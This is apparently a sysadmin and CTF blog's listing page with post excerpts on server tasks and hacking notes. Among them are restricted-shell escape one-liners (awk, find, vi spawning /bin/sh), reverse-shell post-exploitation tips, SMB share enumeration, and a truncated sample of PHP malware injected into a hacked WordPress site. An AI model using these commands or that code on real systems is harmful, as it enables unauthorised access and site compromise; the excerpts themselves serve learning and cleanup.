Manual migration of process to another process might become hasslesome. After you get reverse shell you can automatically migrate the process using post exploitation script. We can do it as following. By the bing by the boom your process will automigrate 😉
Hacking windows shares
First of all lets check if share is enable or not by using nmap scan. Here, port netbios port 139 is open. Now, checkout the shares name. For this we have tool in kali linux called `smbclient`. where, -L will get a list of shares available on a host So, we have number of shares […]
Upgrade to a full tty shell
In ctf after you get a shell you may want to see if you can upgrade to a full tty shell. You can find many ippsec videos on youtube doing this. First see if there is python or not $ which python If it is available, type following command to get bash shell. There is […]
Escaping Restricted Linux Shells
From vi or vim :set shell=/bin/bash Next, type and execute: :shell Another method is to type: :! /bin/bash From awk awk ‘BEGIN {system(“/bin/sh”)}’ From find find / -name blahblah -exec /bin/awk ‘BEGIN {system(“/bin/sh”)}’ \; From more, less and man ‘! /bin/sh’ ‘!/bin/sh’ ‘!bash’ From tee echo “evil script code” | tee script.sh From your fav […]
Install CAPTCHA in your website
Why? Well, to answer this quickly and as short as possible, it is to stop spam. First of all, you may want to know what is CAPTCHA and what is it stand for? The full form of CAPTCHA is a Completely Automated Public Turing test to tell Computers and Humans Apart. It is a type […]
Renew letsencrypt of Zimbra server
After installing Letsencrypt SSL according to https://wiki.zimbra.com/wiki/Installing_a_LetsEncrypt_SSL_Certificate article you need to renew certificate later. To renew certificate you can do following: Login to server as root $ letsencrypt renew Change directory to Zimbra Letsecnrpyt SSL folder # cd /opt/zimbra/ssl/letsencrypt/ Copy new SSL files to Zimbra Letsencrypt folder then change owner to Zimbra. # cp /etc/letsencrypt/live/yourdomain.com/* […]
How to restore hacked WordPress website? v2
BACKUP!! BACKUP!! BACKUP!! Make sure you do backup regularly or at least ask your clients’ to take a clean backup of website. Change Password After your website gets hacked, first thing to do is to make sure that you change passwords ie: cpanel, database, wp-admin, etc Replace Files/Folders 1. Rename public_html folder to something else […]
Add user and database in mongodb
To create database and user and grant readwrite access you can use following: $ mongo > use admin > db.auth(“admin”, “password”) > use database > db.createUser( { user: “user”, pwd: “userpassword”, roles: [ “readWrite”, “database” ] } )
Japanese seo hack WordPress
Ever encountered php unknown code injected at top of your index.php file? I have same issue in my WordPress website where some unknown php scripts was injected at top of index.php file. Below is the sample of that php code: <?php @set_time_limit(3600); @ignore_user_abort(1); $xmlname = ‘mapss271.xml’; $jdir = ”; $smuri_tmp = smrequest_uri(); if($smuri_tmp==”){ $smuri_tmp=’/’; } […]
How to monitor Linux servers in icinga2?
This is third part. Previously, we have installed icinga2 and icingaweb2. Now, we are going to monitor basic services of Linux server. I assume you have followed how to install icinga2 and how to install icingaweb2 post. master server ip: 127.0.0.1 master server hostname: master.server.com client server ip: 0.0.0.0 client server hostname: client.server.com In master […]